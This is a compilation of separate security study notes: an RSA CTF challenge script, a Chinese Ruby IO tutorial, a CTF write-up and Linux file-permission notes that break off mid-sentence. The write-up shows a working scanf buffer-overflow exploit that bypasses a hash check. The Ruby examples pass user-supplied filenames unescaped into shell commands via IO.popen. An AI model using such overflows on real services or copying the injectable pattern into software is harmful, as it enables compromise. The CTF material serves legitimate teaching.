sec-knowleage
#!/usr/bin/env python import gmpy2 from Crypto.Util.number import * import random from flag import flag def primorial(p): q = 1 s = 1 while q < p: r = gmpy2.next_prime(q) if r <= p: s *= r q = r else: break return s def gen_prime(nbit): while True: s = getPrime(36) a = primorial(getPrime(random.randint(7, 9))) b = primorial(getPrime(random.randint(2, 5))) for r in range(10**3, 3*10**3, 2): p = s * a // b - r if gmpy2.is_prime(p) and len(bin(p)[2:]) == nbit: return int(p) p, q = gen_prime(512), gen_prime(512) e, n = 65537, p * q flag = bytes_to_long(flag) enc = pow(flag, e, n) print 'n =', n print 'enc =', enc
sec-knowleage
# IO --- - https://www.kancloud.cn/imxieke/ruby-base/107305 --- IO 类的主要作用就是让程序与外部进行数据的输入(input)/ 输出(output)操作。 # 输入 / 输出的种类 **标准输入 / 输出** 程序在启动后会预先分配 3 个 IO 对象。 - 标准输入 标准输入可以获取从键盘输入的内容。通过预定义常量 `STDIN` 可调用操作标准输入的 IO 对象。另外,用全局变量 `$stdin` 也可以引用标准输入的 IO 对象。不指定接收者的 `gets` 方法等都会默认从标准输入中获取数据。 - 标准输出 向标准输出写入的数据会显示在屏幕中。通过预定义常量 `STDOUT` 可调用操作标准输出的 IO 对象。另外,用全局变量 `$stdout` 也可以引用标准输出的 IO 对象。不指定接收者的 `puts`、`print`、`printf` 等方法会默认将数据写入到标准输出。 - 标准错误输出 向标准错误输出写入的数据会显示在屏幕中。通过预定义常量 `STDERR` 可调用操作标准错误输出的 IO 对象。另外,用全局变量 `$stderr` 也可以引用标准错误输出的 IO 对象。 标准错误输出原本是用于输出错误信息的,但实际上,除输出警告或者错误之外,在希望与程序正常输出的信息做出区别时也可以使用它 ```ruby $stdout.print "Output to $stdout.\n" # 标准输出 $stderr.print "Output to $stderr.\n" # 标准错误输出 ``` 执行示例 ``` > ruby out.rb Output to $stdout. Output to $stderr. ``` 将输出结果重定向到文件时,标准输出的内容会被写入到文件,只有标准错误输出的内容被输出到屏幕中。 ``` 执行示例 > ruby out.rb > log.txt Output to $stderr. ``` 在执行程序时,在命令后加上 `>` 文件名,就可以将程序执行时的输出结果保存到文件中。我们把这个控制台的功能称为“重定向”。通过这个功能,不仅 ruby 命令,程序的输出内容也都可以保存在文件中。 根据需要灵活使用标准输出与标准错误输出,可以使我们很方便地分开获取正常信息与错误信息。 > 备注 ruby 命令的错误信息也会被输出到标准错误输出。 通常标准输入、标准输出、标准错误输出都是与控制台关联的。但是将命令的输出重定向到文件,或者使用管道(pipe)将结果传递给其他程序时则与控制台没有关系。根据实际的使用情况,程序的输入 `/` 输出状态也各异。IO 对象是否与控制台关联,我们可以通过 `tty?` 方法判断。 一个检查标准输入是否为屏幕的例子 ```ruby if $stdin.tty? print "Stdin is a TTY.\n" else print "Stdin is not a TTY.\n" end ``` 下面我们用不同的方式调用这个程序,看看有何不同。首先是普通调用。 执行示例 ``` > ruby tty.rb Stdin is a TTY. ``` 将命令的输出结果传给管道,或者通过文件输入内容时,程序的结果会不一样。 执行示例 ``` > echo | ruby tty.rb Stdin is not a TTY. > ruby tty.rb < data.txt Stdin is not a TTY. ``` > TTY 是 TeleTYpe 的缩写。 **文件输入 / 输出** 通过 `IO` 类的子类 `File` 类可以进行文件的输入 `/` `输出处理。File` 类中封装了文件删除、文件属性变更等文件专用的功能,而一些基本的输入 `/` 输出处理则使用继承自 `IO` 类的方法。 - **io= File.open(file, mode)** - **io = open(file, mode)** 通过 `File.open` 方法或 `open` 方法打开文件并获取新的 `IO` 对象。 模式(mode)会指定以何种目的打开文件。缺省模式为只读模式(`"r"`)。在 Windows 环境下,在各模式后加上 `b`、通过 `"rb"`、`"rb+"` 等这样的形式即可表示二进制模式(后述)。 模式 | 意义 - | - r | 用只读模式打开文件。 r+ | 用读写模式打开文件。 w | 用只写模式打开文件。文件不存在则创建新的文件;文件已存在则清空文件,即将文件大小设置为0。 w+ | 读写模式,其余同 "w" 。 a | 用追加模式打开文件。文件不存在则创建新的文件。 a+ | 用读取/ 追加模式打开文件。文件不存在则创建新的文件。 - **io.close** 使用 `close` 方法关闭已打开的文件。 1 个程序中同时打开文件的数量是有限制的,因此使用完的文件应该尽快关闭。如果打开多个文件而不进行关闭操作,程序就很可能会在使用 `open` 方法时突然产生异常。 `File.open` 方法如果使用块,则文件会在使用完毕后自动关闭。这种情况下,`IO` 对象会被作为块变量传递给块。块执行完毕后,块变量引用的 `IO` 对象也会自动关闭。这种写法会使输入 `/` 输出的操作范围更加清晰。 ```ruby File.open("foo.txt") do |io| while line = io.gets ┊ end end ``` - **io.close?** 用 `close?` 方法可以检查 `IO` 对象是否关闭了。 ```ruby io = File.open("foo.txt") io.close p io.closed? #=> true ``` - **File.read(file)** 使用类方法 `read` 可以一次性读取文件 `file` 的内容。 ```ruby data = File.read("foo.txt") ``` > 在 Windows 中不能使用 `File.read` 方法读取像图像数据等二进制数据。`File.read` 方法使用文本模式打开文件时,会对换行符等进行转换,因此无法得到正确的结果。 # 基本的输入 / 输出操作 输入 / 输出操作的数据为字符串,也就是所谓的 `String` 对象。执行输入操作后,会从头到尾按顺序读取数据,执行输出操作后,则会按写入顺序不断追加数据。 **输入操作** - **io.gets(rs)** - **io.each(rs)** - **io.each_line(rs)** - **io.readlines(rs)** 从 `IO` 类的对象 `io` 中读取一行数据。用参数 `rs` 的字符串分行。省略 `rs` 时则用预定义变量 `$/`(默认值为 `"\n"`)。 这些方法返回的字符串中包含行末尾的换行符。用 `chmop!` 方法可以很方便地删除字符串末尾的换行符。 输入完毕后再尝试获取数据时,`gets` 方法会返回 `nil`。另外,我们还可以使用 `eof?` 方法检查输入是否已经完毕。 ```ruby while line = io.gets line.chomp! ┊ # 对line 进行的操作 end p io.eof? #=> true ``` `while` 条件表达式中同时进行了变量赋值与条件判断的操作。将 `gets` 方法的返回值复制给 `line`,并将该值作为 `while` 语句的条件来判断。上面是 `gets` 方法的经典用法,大家应该尽快掌握这种写法。 用 `each_line` 方法也可以实现同样的效果。 ```ruby io.each_line do |line| line.chomp! ┊ # 对line 进行的操作 end ``` 另外,用 `readlines` 方法可以一次性地读取所有数据,并返回将每行数据作为元素封装的数组。 ```ruby ary = io.readlines ary.each_line do |line| line.chomp! ┊ # 对line 进行的操作 end ``` > gets 方法与 puts 方法,分别是“get string”、“put string”的意思。 - **io.lineno** - **io.lineno=(number)** 使用 `gets` 方法、`each_line` 方法逐行读取数据时,会自动记录读取的行数。这个行数可以通过 `lineno` 方法取得。此外,通过 `lineno=` 方法也可以改变这个值,但值的改变并不会对文件指针(后述)有影响。 在下面的例子中,逐行读取标准输入的数据,并在行首添加行编号。 ```ruby $stdin.each_line do |line| printf("%3d %s", $stdin.lineno, line) end ``` - **io.each_char** 逐个字符地读取 `io` 中的数据并执行块。将得到的字符(`String` 对象)作为块变量传递。 - **io.getc** 只读取 `io` 中的一个字符。根据文件编码的不同,有时一个字符会由多个字节组成,但这个方法只会读取一个字符,然后返回其字符串对象。数据全部读取完后再读取时会返回 `nil`。 ```ruby while ch = io.getc ┊ # 对line 进行的操作 end ``` - **io.ungetc(ch)** 将参数 `ch` 指定的字符退回到 `io` 的输入缓冲中。 ```ruby # hello.txt 中的内容为“Hello, Ruby.\n” File.open("hello.txt") do |io| p io.getc #=> "H" io.ungetc(72) p io.gets #=> "Hello, Ruby.\n" end ``` 指定一个字符大小的字符串对象。对可退回的字符数没有限制。 - **io.getbyte** 只读取 `io` 中的一个字节,返回得到的字节转换为 `ASCII` 码后的整数对象。数据全部读取完后再读取时会返回 `nil`。 - **io.ungetbyte(byte)** 将参数 `byte` 指定的一个字节退回到输入缓冲中。参数为整数时,将该整数除以 256 后的余数作为 ASCII 码字符返回一个字节;参数为字符串时,只返回字符串的第一个字节。 - **io.read(size)** 读取参数 `size` 指定的大小的数据。不指定大小时,则一次性读取全部数据并返回。 ```ruby # hello.txt 中的内容为"Hello, Ruby.\n" File.open("hello.txt") do |io| p io.read(5) #=> "Hello" p io.read #=> ",Ruby.\n" end ``` **输出操作** - **io.puts(str0, str1, …)** 对字符串末尾添加换行符后输出。指定多个参数时,会分别添加换行符。如果参数为 `Sting` 类以外的对象,则会调用 `to_s` 方法,将其转换为字符串后再输出。 ```ruby $stdout.puts "foo", "bar", "baz" ``` 执行示例 ``` > ruby stdout_put.rb foo bar baz ``` - **io.putc(ch)** 输出参数 `ch` 指定的字符编码所对应的字符。参数为字符串时输出首字符。 ```ruby $stdout.putc(82) # 82 是R 的ASCII 码 $stdout.putc("Ruby") $stdout.putc("\n") ``` 执行示例 ``` > ruby stdout_putc.rb RR ``` - **io.print(str0, str1, …)** 输出参数指定的字符串。参数可指定多个字符串。参数为 `String` 以外的对象时会自动将其转换为字符串。 - **io.printf(fmt, arg0, arg1, …)** 按照指定的格式输出字符串。格式 `fmt` 的用法与 `printf` 方法一样 - **io.write(str)** 输出参数 `str` 指定的字符串。参数为 `String` 以外的对象时会自动将其转换为字符串。方法返回值为输出的字节数。 ```ruby size = $stdout.write("Hello.\n") #=> Hello. p size #=> 6 ``` - **io<<str** 输出参数 `str` 指定的字符串。`<<` 会返回接收者本身,因此可以像下面这样写: ```ruby io << "foo" << "bar" << "baz" ``` # 文件指针 一般情况下,我们会以行为单位处理文本数据。由于只有当读取到换行符时才能知道行的长度,因此,如要读取第 100 行的数据,就意味着要将这 100 行的数据全部读取。另外,如果我们修改了数据,行的长度也会随之变更,这样一来,文件中后面的数据就都要做出修改。 为了提高读取效率,可以将文件分成固定长度的文件块,来直接访问某个位置的数据(虽然据此可以访问任意位置的数据,但却不能处理超过指定长度的数据)。 我们用文件指针(file pointer)或者当前文件偏移量(current file offset)来表示 `IO` 对象指向的文件的位置。每当读写文件时,文件指针都会自动移动,而我们也可以使文件指针指向任意位置来读写数据。 - **io.pos** - **io.pos=(position)** 通过 `pos` 方法可以获得文件指针现在的位置。改变文件指针的位置用 `pos=` 方法。 ```ruby # hello.txt 中的内容为"Hello, Ruby.\n" File.open("hello.txt") do |io| p io.read(5) #=> "Hello" p io.pos #=> 5 io.pos = 0 p io.gets #=> "Hello, Ruby.\n" end ``` - **io.seek(offset, whence)** 移动文件指针的方法。参数 `offset` 为用于指定位置的整数,参数 `whence` 用于指定 `offset` 如何移动 whence | 意义 - | - IO::SEEK_SET | 将文件指针移动到 offset 指定的位置 IO::SEEK_CUR | 将 offset 视为相对于当前位置的偏移位置来移动文件指针 IO::SEEK_END | 将 offset 指定为相对于文件末尾的偏移位置 - **io.rewind** 将文件指针返回到文件的开头。`lineno` 方法返回的行编号为 0。 ```ruby # hello.txt 中的内容为"Hello, Ruby.\n" File.open("hello.txt")do |io| p io.gets #=> "Hello,Ruby.\n" io.rewind p io.gets #=> "Hello, Ruby.\n" end ``` - **io.truncate(size)** 按照参数 `size` 指定的大小截断文件。 ```ruby io.truncate(0) # 将文件大小置为0 io.truncate(io.pos) # 删除当前文件指针以后的数据 ``` # 二进制模式与文本模式 不同平台下的换行符也不同。 虽然各个平台的换行符不一样,但为了保证程序的兼容性,会将字符串中的 `"\n"` 转换为当前 OS 的换行符并输出。此外,在读取的时候也会将实际的换行符转换为 `"\n"`。 下图是 Windows 中转换换行符的情形 **Windows 环境中字符 "\n" 的转换** 当需要确定文件大小进行输入 `/` 输出处理时,或者直接使用从其他平台拷贝的文件时,如果进行换行符转换,就有可能会引发问题。 为了解决上述那样的问题,Ruby 中还提供了不进行换行符转换的方法。换行符处理的前提是以行为单位做输入 / 输出处理,需要转换时称为文本模式,反之不需要转换时则称为二进制模式。 - **io.binmode** 新的 `IO` 对象默认是文本模式,使用 `binmode` 方法可将其变更为二进制模式。 ```ruby File.open("foo.txt", "w") do |io| io.binmode io.write "Hello, world.\n" end ``` 这样就可以既不用转换换行符,又能得到与文件中一模一样的数据。 > 转换为二进制模式的 IO 对象无法再次转换为文本模式。 # 缓冲 即使对 `IO` 对象输出数据,结果也并不一定马上就会反映在控制台或者文件中。在使用 `write`、`print` 等方法操作 `IO` 对象时,程序内部会开辟出一定的空间来保存临时生成的数据副本。这部分空间就称为缓冲(buffer)。缓冲里累积一定量的数据后,就会做实际的输出处理,然后清空缓冲。 像这样,使用临时缓冲进行数据处理称为缓冲处理(buffering)。 在向控制台输出的两种方式(标准输出与标准错误输出)中,标准错误输出完全不采用缓冲处理。因此,当两种方式混合使用时,程序实际输出的顺序可能会与程序代码中记录的顺序不一样。 ```ruby $stdout.print "out1 " $stderr.print "err1 " $stdout.print "out2 " $stdout.print "out3 " $stderr.print "err2\n" $stdout.print "out4\n" ``` 执行示例 ``` > ruby test_buffering1.rb err1 err2 out1 out2 out3 out4 ``` 标准错误输出的主要目的是输出如警告、错误等信息,因此执行结果必须马上反映出来。再次强调,建议在显示程序中正常信息以外的信息时使用标准错误输出。 虽然缓冲处理可以提高输出效率,但有时候我们会希望执行结果可以马上反映出来,这时我们就可以用下面的方法来同步数据的操作与输出。 - **io.flush** 强制输出缓冲中的数据。在基础上追加 `$stdout.flush` 的调用。 ```ruby $stdout.print "out1 "; $stdout.flush $stderr.print "err1 " $stdout.print "out2 "; $stdout.flush $stdout.print "out3 "; $stdout.flush $stderr.print "err2\n" $stdout.print "out4\n" ``` 执行示例 ``` > ruby test_buffering2.rb out1 err1 out2 out3 err2 out4 ``` - **io.sync** - **io.sync=(state)** 通过 `io.sync = true`,程序写入缓冲时 `flush` 方法就会被自动调用。 ```ruby $stdout.sync = true # 同步输出处理 $stdout.print "out1 " $stderr.print "err1 " $stdout.print "out2 " $stdout.print "out3 " $stderr.print "err2\n" $stdout.print "out4\n" ``` 即使不逐次调用 flush 方法,也可以像下面那样按顺序输出: ``` > ruby test_buffering3.rb out1 err1 out2 out3 err2 out4 ``` # 与命令进行交互 虽然 Ruby 是几乎什么都能实现的强大的语言,但是也会有与其他命令进行数据交换的时候。例如,读取使用 GUN zip 压缩的数据的时候,使用 gunzip 命令会很方便。在 Ruby 中,使用 `IO.popen` 方法可以与其他命令进行数据处理。 - **IO.popen(command, mode)** 参数 `mode` 的使用方法与 `File.open` 方法是一样的,参数缺省时默认为 `"r"` 模式。 用 `IO.popen` 方法生成的 `IO` 对象的输入 / 输出,会关联启动后的命令 command 的标准输入 / 输出。也就是说,`IO` 对象的输出会作为命令的输入,命令的输出则会作为 `IO` 对象的输入。 利用 `gunzip` 命令解压处理扩展名为 `.gz` 的文件(`-c` 为将解压后的结果写入到标准输出时的选项)。 ```ruby pattern = Regexp.new(ARGV[0]) filename = ARGV[1] if /.gz$/ =~ filename file = IO.popen("gunzip -c #{filename}") else file = File.open(filename) end file.each_line do |text| if pattern =~ text print text end end ``` - **open("|command", mode)** 将带有管道符号的命令传给 `open` 方法的效果与使用 `IO.popen` 方法是一样的。 ```ruby filename = ARGV[0] open("|gunzip -c #{filename}") do |io| io.each_line do |line| print line end end ``` # open-uri 库 除了控制台、文件以外,进程间通信时使用的管道(pipe)、网络间通信时使用的套接字(socket)也都可以作为 `IO` 对象使用。 通过 `require` 引用 `open-uri` 库后,我们就可以像打开普通的文件一样打开 HTTP、FTP 的 URL。使用 `open-uri` 库的功能时,不要使用 `File.open` 方法,只使用 `open` 方法即可。 ```ruby require "open-uri" # 通过HTTP 读取数据 open("http://www.ruby-lang.org") do |io| puts io.read # 将Ruby 的官方网页输出到控制台 end # 通过FTP 读取数据 url = "ftp://www.ruby-lang.org/pub/ruby/2.0/ruby-2.0.0-p0.tar.gz" open(url) do |io| open("ruby-2.0.0-p0.tar.gz", "w") do |f| # 打开本地文件 f.write(io.read) end end ``` 通过 HTTP 协议时,服务器会根据客户端的状态改变应答的内容,比如返回中文或英语的网页等。为了实现这个功能,请求时就需要向服务器发送元信息(meta information)。 例如,HTTP 头部信息 Accept-Language 就表示优先接收中文网页。指定 HTTP 头部信息时,会将其以散列的形式传递给 open 方法的第 2 个参数。 ```ruby require "open-uri" options = { "Accept-Language" => "zh-cn, en;q=0.5", } open("http://www.ruby-lang.org", options){|io| puts io.read } ``` # stringio 库 在测试程序时,虽然我们会希望知道向文件或控制台输出了什么,但程序实际执行的结果却往往很难知道。为此,我们可以通过向模拟 `IO` 对象的对象进行输出来确认执行结果。 `StringIO` 就是用于模拟 `IO` 对象的对象。通过 `require` 引用 `stringio` 库后,就可以使用 `StringIO` 对象了。 ```ruby require "stringio" io = StringIO.new io.puts("A") io.puts("B") io.puts("C") io.rewind p io.read #=> "A\nB\nC\n" ``` 实际上,向 `StringIO` 对象进行的输出并不会被输出到任何地方,而是会被保存在对象中,之后就可以使用 `read` 方法等来读取该输出。 `StringIO` 对象还有另外一种用法,那就是将字符串数据当作 `IO` 数据处理。将大数据保存在文件中,并将小数据直接传输给别的处理时,通过使用 `StringIO` 对象,程序就可以不区分对待 `IO` 对象和字符串了。实际上,之前介绍的用 `open-uri` 库打开 `URI` 时,也是有时候返回 IO 对象,有时候返回 `StringIO` 对象。不过一般情况下,我们不需要在意这两者的区别。通过将数据字符串传递给 `StringIO.new` 方法的参数,就可以由字符串创建 `StringIO` 对象。 ```ruby require "stringio" io = StringIO.new("A\nB\nC\n") p io.gets #=> "A\n" p io.gets #=> "B\n" p io.gets #=> "C\n" ```
sec-knowleage
# Somewhat SecureBoot Category: Pwn, 150 Points ## Description > My boss told me to implement a chain of trust mechanism for a remote server boot process. He said: "There are 3 bootloaders - BL1, BL2, BL3. make sure that no one will be able to compromise our images. use a strong integrity solution, You can use SHA256 or something." > > So that's exactly what I did. The funny thing is - BL3 was already compromised, I have no idea what BL3 is suppose to do. But I do know that it's something important. > > BTW, I don't think my boss knows much about integrity (don't tell him I said it). > > nc challenges.ctfd.io 30071 An executable was attached. ## Solution Let's connect to the service: ```console root@kali:/media/sf_CTFs/matrix/Somewhat_SecureBoot# nc challenges.ctfd.io 30071 Bootloader number 1 - Up and running... Checking environment... Env is valid. Setting up memory... Configuring hardware... Bootloader 1 completed. Calling next bootloader to load the kernel... Attempting to load the bootloader /bootloaders/BL2.bin with hash e95e57eff2ae77a55f0559450ffafb508a33a21fff0c8a702f8858e682a02281 Bootloader integrity verified successfully. Bootloader number 2... Up and running... Configuring kernel... Setting up process table... Reserving ports 0-1023... Initializing scheduler... Crontab daemon started... Bootloader 2 finished. Calling next bootloader to open up a shell... Please enter the desired shell to execute upon startup (press 'a' for /bin/sh) a Executing shell: /bin/sh Attempting to load the bootloader /bootloaders/BL3.bin with hash 20375b4eec91d51308d624660f7e0b4e8cd9fa4f82b5d50b6d38b6d1452c3070 Bootloader integrity compromised... Expected receiving hash: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Exiting... ``` We are asked to provide input. Entering 'a' should connect us to a `/bin/sh`, assuming we have a bootloader with the expected hash of `aaaaa...aa`. It looks like we have a different one though. Let's take a look at the decompiled sources with Ghidra: ```c undefined8 main(void) { long lVar1; int iVar2; char **ppcVar3; long in_FS_OFFSET; char bootloader3_str [21]; char user_input [32]; char aaa_str [65]; lVar1 = *(long *)(in_FS_OFFSET + 0x28); bootloader3_str._0_8_ = 7020949591435469359; bootloader3_str._8_8_ = 3696402165732107620; bootloader3_str._16_4_ = 1852400174; bootloader3_str[20] = '\0'; aaa_str._0_8_ = 0x6161616161616161; aaa_str._8_8_ = 0x6161616161616161; aaa_str._16_8_ = 0x6161616161616161; aaa_str._24_8_ = 0x6161616161616161; aaa_str._32_8_ = 0x6161616161616161; aaa_str._40_8_ = 0x6161616161616161; aaa_str._48_8_ = 0x6161616161616161; aaa_str._56_8_ = 0x6161616161616161; aaa_str[64] = '\0'; puts("Bootloader number 2... Up and running...\n"); fflush(stdout); puts("Configuring kernel..."); fflush(stdout); usleep(500000); puts("Setting up process table..."); fflush(stdout); usleep(600000); puts("Reserving ports 0-1023..."); fflush(stdout); usleep(600000); puts("Initializing scheduler..."); fflush(stdout); usleep(700000); puts("Crontab daemon started..."); fflush(stdout); usleep(700000); puts("Bootloader 2 finished. Calling next bootloader to open up a shell...\n"); fflush(stdout); puts("Please enter the desired shell to execute upon startup (press \'a\' for /bin/sh)\n"); fflush(stdout); __isoc99_scanf("%s",user_input); iVar2 = strcmp(user_input,"a"); if (iVar2 == 0) { user_input._0_8_ = 29400045130965551; } printf("Executing shell: %s\n\n",user_input); fflush(stdout); ppcVar3 = read_firmaware(bootloader3_str); printf("Attempting to load the bootloader %s with hash %s\n",*ppcVar3,ppcVar3[1]); fflush(stdout); iVar2 = strcmp(ppcVar3[1],aaa_str); if (iVar2 == 0) { puts("Bootloader integrity verified successfully."); fflush(stdout); load(ppcVar3); } else { printf("Bootloader integrity compromised... Expected receiving hash: %s\nExiting...\n",aaa_str); fflush(stdout); destroy_bootloader(ppcVar3); } if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return 0; } ``` We see that the program uses `scanf` to read user input into a buffer of 32 bytes. `scanf` is unsafe and we can use it to perform a buffer overflow. ```console root@kali:/media/sf_CTFs/matrix/Somewhat_SecureBoot# python3 -c "print ('b'*35)" | nc challenges.ctfd.io 30071 | grep hash Attempting to load the bootloader /bootloaders/BL2.bin with hash e95e57eff2ae77a55f0559450ffafb508a33a21fff0c8a702f8858e682a02281 Attempting to load the bootloader /bootloaders/BL3.bin with hash 20375b4eec91d51308d624660f7e0b4e8cd9fa4f82b5d50b6d38b6d1452c3070 Bootloader integrity compromised... Expected receiving hash: bbb ``` Looks like we can override the expected hash. Let's override it with the actual value: ```console root@kali:/media/sf_CTFs/matrix/Somewhat_SecureBoot# python3 -c "print ('b'*32 + '20375b4eec91d51308d624660f7e0b4e8cd9fa4f82b5d50b6d38b6d1452c3070')" | nc challenges.ctfd.io 30071 Bootloader number 1 - Up and running... Checking environment... Env is valid. Setting up memory... Configuring hardware... Bootloader 1 completed. Calling next bootloader to load the kernel... Attempting to load the bootloader /bootloaders/BL2.bin with hash e95e57eff2ae77a55f0559450ffafb508a33a21fff0c8a702f8858e682a02281 Bootloader integrity verified successfully. Bootloader number 2... Up and running... Configuring kernel... Setting up process table... Reserving ports 0-1023... Initializing scheduler... Crontab daemon started... Bootloader 2 finished. Calling next bootloader to open up a shell... Please enter the desired shell to execute upon startup (press 'a' for /bin/sh) Executing shell: bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb20375b4eec91d51308d624660f7e0b4e8cd9fa4f82b5d50b6d38b6d1452c3070 Attempting to load the bootloader /bootloaders/BL3.bin with hash 20375b4eec91d51308d624660f7e0b4e8cd9fa4f82b5d50b6d38b6d1452c3070 Bootloader integrity verified successfully. Bootloader number 3... Up and running... Bootloader number 3 - Finished. System is fully loaded and ready to use. The time is: 2020-02-20,20:40:23. Welcome. Congrats! FLAG__b00t_c0mpleted ```
sec-knowleage
# 文件 `Linux 的哲学就是一切皆文件` > 注 : 笔记中拓扑图 xmind 源文件在其图片目录下 --- ## 大纲 * **[文件类型](#文件类型)** * **[文件权限](#文件权限)** * **[目录结构](#目录结构)** * [/bin](#bin) * [/boot](#boot) * [/dev](#dev) * [/etc](#etc) * [/home](#home) * [/lib](#lib) * [/lost+found](#lostfound) * [/media](#media) * [/opt](#opt) * [/proc](#proc) * [/root](#root) * [/run](#run) * [/sbin](#sbin) * [/selinux](#selinux) * [/srv](#srv) * [/sys](#sys) * [/tmp](#tmp) * [/usr](#usr) * [/var](#var) * **[inode](#inode)** --- ## 文件类型 * 普通文件 : 例如图片、文本、音乐、可执行程序等 * 目录文件 : 文件夹,例如/home、/root * 链接文件 : 当创建一个已存在文件的符号链接时,系统就创建一个链接文件,这个链接文件指向已存在的文件 * 设备文件 : 例如鼠标、键盘、网卡、光驱 * 命名管道(FIFO) : 一种特殊类型的文件,linux系统下,进程之间通信可以通过该文件完成 --- ## 文件权限 - 权限类型:读、写、执行 - 权限表示方式:模式位 ``` drwxr-xr-x 11 root root 1111 Sep 11 11:11 test | | | | | | | | | |__文件名 | | | | | | | | |__最后修改时间 | | | | | | | |__文件大小 | | | | | | |__文件拥有者 GID | | | | | |__文件拥有者 UID | | | | |__链接数 | | | |__系统中其他用户权限(O) | | |__文件所有者所在组其他用户的权限(G) | |__文件拥有者的权限(U) |文件类型:d 为文件夹-是文件 ``` **文件类型** * `d` 文件夹,可以代表目录或文件 * `l` 链接文件,就是类似 Windows 底下的快捷方式 * `-` 文件,就是一般类型的文件 * `b` 块设备,就是一些储存数据,以提供系统存取的接口设备,简单的说就是硬盘 * `s` 套接字 * `c` 字符设备,即是一些串行端口的接口设备,例如键盘、鼠标等 * `p` 命名管道 **权限的数字表示法** ``` rwx r-x r-x ||| ||| ||| 111 101 101 | | | 7 5 5 ``` **权限的特殊属性** * SUID ```bash -rwsr-xr-x | SUID 程序 ``` 当 s 出现在文件拥有者的 x 权限上时,如 `/usr/bin/passwd` 这个文件的权限为 -rwsr-xr-x,此时就被称为 SET UID 简称 SUID.SUID 对于一个文件有什么限制和功能呢? * SUID 权限仅对二进制可执行文件有效 * 执行者对于该文件具有 x 的权限 * 本权限仅在执行该文件的过程中有效 * 执行者将具有该文件拥有者的权限 例如普通用户用 passwd 修改自己的命令,实际上最终更改的是 `/etc/passwd` 文件. 此文件时用户管理配置文件,只有 root 权限才能更改. 既然是 root 用户才拥有此权限,为什么我们可以通过 passwd 命令来修改密码呢,那这就要归功于 passwd 设置了 suid 权限位了.普通用户通过执行 passwd 命令,临时拥有 root 权限,间接的修改 `/etc/passwd`,以达到修改自己密码的权限. * SGID 当 s 出现在目录或文件所属群的 x 权限上时,此时就称为 SET GID 简称 SGID,那 SGID 对文件和目录分部有哪些功能呢? * SGID 对目录 使用者若对于此目录具有 r 与 x 的权限时,该使用者能够进入此目录 使用者在此目录下的群组将会变成该目录的群组 若使用者在此目录下具有 w 的权限(可以新建文件),则使用者所创建的新文件,该新文件的群组与此目录的群组相同 * SGID 对文件 SGID 对二进制可执行文件有效 程式执行者对于该文件来说,需具备 x 的权限 执行者在执行的过程中将会获得该文件群组的支援(用于改文件群组的权限) * SBIT(粘滞位) 粘滞位表示,只有文件所有者才能删除该文件,即使组权限允许该文件可以删除。通常,在 /tmp 这样的通用或协作目录上,此设置最有意义。 当 t 出现在目录其他用户的 x 权限上时,此时就称为 Sticky Bit 简称 SBIT,那 SBIT 有哪些限制和作用呢? 仅对目录有效,对文件无效 当使用者在该目录下建立文件或目录时(有权限的情况下),仅自己与 root 才有权力删除新建的目录或文件 我们知道 `/tmp` 目录是这样的权限 ```bash drwxrwxrwt. 13 root root 4096 10月 24 22:16 tmp ``` 现在我们来验证下,先用 root 账号在 tmp 文件中创建一个文件 test,然后用 openstack(其他账号)进入该目录,删除 test 文件,看看发生什么情况 我们看到这样是不能删除文件的.因为 `/temp` 目录有 SBIT 权限. * 配置 SUID、SGID、Sticky 属性 ```bash chmod u+s test_file # 给文件增加 SUID 属性 chmod g+s test_dir # 给目录增加 SGID 属性 chmod o+t test_dir # 给目录增加 Sticky 属性 ``` * umask umask 会屏蔽(或 “阻止”)默认权限集中的位,以定义文件或目录的权限。例如,umask 输出中的 2 表示它至少在默认情况下阻止了文件的“写入” 位。 使用不带任何参数的 umask 命令可以使我们看到当前的 umask 设置。共有四列:第一列为特殊的suid、sgid 或粘滞位而保留,其余三列代表属主、组和其他人的权限。 ```bahs > umask 0022 > umask -S u=rwx,g=rx,o=rx ``` **linux 下删除一个文件需要的权限** 要删除一个文件,对该文件所在目录需要拥有 write 和 execute 权限,对该文件本身却没有 write 权限要求. **文件系统类型** * ext : 第一个专门针对 liunx 的文件系统 * ext2 : 为解决 ext 文件系统缺陷设计的高性能、可扩展的文件系统 * ext3 : 日志文件系统,ext2 的升级版 * ext4 : Ext4 提供了更为可靠性的功能 * swap : Linux 的交换分区 * NFS : Linux 的网络文件系统 * smb : 支持 smb 协议的网络文件系统 * vfat : 与 windows 系统兼容的 linux 文件系统 * ntfs : windows NT 所采用的独特的文件系统结构 * proc : Linux 操作系统中的一种基于内存的伪文件系统 * xfs : 由 SGI 开发的一个全64位、快速、安全的日志文件系统 --- ## 目录结构 Linux 文件系统的结构层次鲜明,延展开就是个树形结构,最顶层是其根目录: ### / 根目录,位于 Linux 文件系统目录结构的顶层 ### /bin bin 是 Binary 的缩写, 这个目录存放着最经常使用的命令 (ls,cat,mkdir 等). ### /boot 这里存放的是启动 Linux 时使用的一些核心文件,包括一些连接文件以及镜像文件. **/boot/grub** 开机设定相关 --- ### /dev dev 是 Device(设备)的缩写, 该目录下存放的是 Linux 的外部设备,在 Linux 中访问设备的方式和访问文件的方式是相同的. **/dev/null** 在类 Unix 系统中,`/dev/null` 称空设备,是一个特殊的设备文件,它丢弃一切写入其中的数据(但报告写入操作成功),读取它则会立即得到一个 EOF. **/dev/pty/** 伪终端(Pseudo Terminal)是成对的逻辑终端设备(即 master 和 slave 设备, 对 master 的操作会反映到 slave 上)。 例如 `/dev/ptyp3` 和 `/dev/ttyp3`(或者在设备文件系统中分别是 `/dev/pty/m3` 和 `/dev/pty/s3`),它们与实际物理设备并不直接相关 如果一个程序把 ptyp3(master 设备)看作是一个串行端口设备,则它对该端口的读/写操作会反映在该逻辑终端设备对应的另一个 ttyp3(slave 设备)上面。 而ttyp3则是另一个程序用于读写操作的逻辑设备。 这样,两个程序就可以通过这种逻辑设备进行互相交流,而其中一个使用 ttyp3 的程序则认为自己正在与一个串行端口进行通信。这很象是逻辑设备对之间的管道操作。对于 ttyp3(s3),任何设计成使用一个串行端口设备的程序都可以使用该逻辑设备。但对于使用 ptyp3 的程序,则需要专门设计来使用 ptyp3(m3)逻辑设备。 例如,如果某人在网上使用 telnet 程序连接到你的计算机上,则 telnet 程序就可能会开始连接到设备 ptyp2(m2)上(一个伪终端端口上),此时一个 getty 程序就应该运行在对应的 ttyp2(s2)端口上。 当 telnet 